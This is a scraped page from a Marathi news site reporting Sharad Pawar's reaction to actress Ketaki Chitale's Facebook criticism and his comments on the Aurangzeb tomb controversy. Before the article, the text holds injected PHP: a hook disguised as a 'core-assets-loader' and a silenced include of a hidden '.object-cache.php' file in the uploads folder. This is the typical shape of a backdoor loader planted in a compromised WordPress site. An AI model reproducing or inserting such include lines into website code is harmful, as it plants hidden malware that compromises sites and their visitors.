add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); केतकी चितळेंवर शरद पवारांची पहिली प्रतिक्रिया – SOCH INDIA
Menu

केतकी चितळेंवर शरद पवारांची पहिली प्रतिक्रिया

nobanner

Sharad Pawar | राष्ट्रवादी काँग्रसचे सर्वेसर्वा शरद पवार यांच्यावर शेलक्या भाषेत टीका करणारी अभिनेत्री केतकी चितळे हिच्यासमोरील अडचणी वाढण्याची शक्यता आहे. कारण, सध्या राज्यभरात राष्ट्रवादी काँग्रेसच्या कार्यकर्त्यांनी केतळी चितळे हिच्याविरोधात पोलिसांत तक्रारी करण्याचा सपाटा लावला आहे. याविषयी शरद पवार यांना विचारण्यात आले असता त्यांनी आपल्याला याबद्दल काहीही माहिती नसल्याचे सांगत बोलणे टाळले.

मुंबई: अभिनेत्री केतकी चितळे हिने फेसबुकच्या माध्यमातून राष्ट्रवादी काँग्रेसचे सर्वेसर्वा शरद पवार यांच्यावर आक्षेपार्ह भाषेत टीका केली होती. यानंतर राज्यभरातून संतप्त भावना व्यक्त होत आहेत. या पार्श्वभूमीवर शरद पवार (Sharad Pawar) यांनाच विचारणा करण्यात आली असता त्यांनी आपल्याला याविषयी काहीही माहिती नसल्याचे सांगत फार बोलणे टाळले. मला काहीही ठाऊक नाही. कोणत्या व्यक्तीने टीका केली आणि ती व्यक्ती काय बोलली, हे मला माहिती नाही. संबंधित व्यक्ती नेमकं काय बोलली, हे जाणून घेतल्याशिवाय मी त्यावर प्रतिक्रिया देणे योग्य ठरणार नाही, असे शरद पवार यांनी म्हटले.

तसेच गेल्या काही दिवसांत माझ्याविरोधात होणाऱ्या तक्रारी वाचनात आल्या. मी एका काव्याचा उल्लेख केला होता. मात्र, त्यानंतर वेगळं चित्र मांडण्यात आले. ते वास्तव नव्हते, असे शरद पवार यांनी सांगितले. अकबरुद्दीन ओवेसी यांनी औरंगजेबाच्या कबरीचे दर्शन घेतल्यामुळे निर्माण झालेल्या वादावरही शरद पवार यांनी भाष्य केले. त्यांनी म्हटले की, मला महाराष्ट्राचा आणि देशाचा इतिहास माहिती आहे. औरंगजेबाने त्याच्या कालखंडात काय केले हे माहिती असतानाही कोणीतरी बाहेरून येऊन महाराष्ट्रात अशांतता पसरवण्याचा प्रयत्न करतात. या सगळ्याचा निषेधच केला पाहिजे, असे शरद पवार यांनी म्हटले.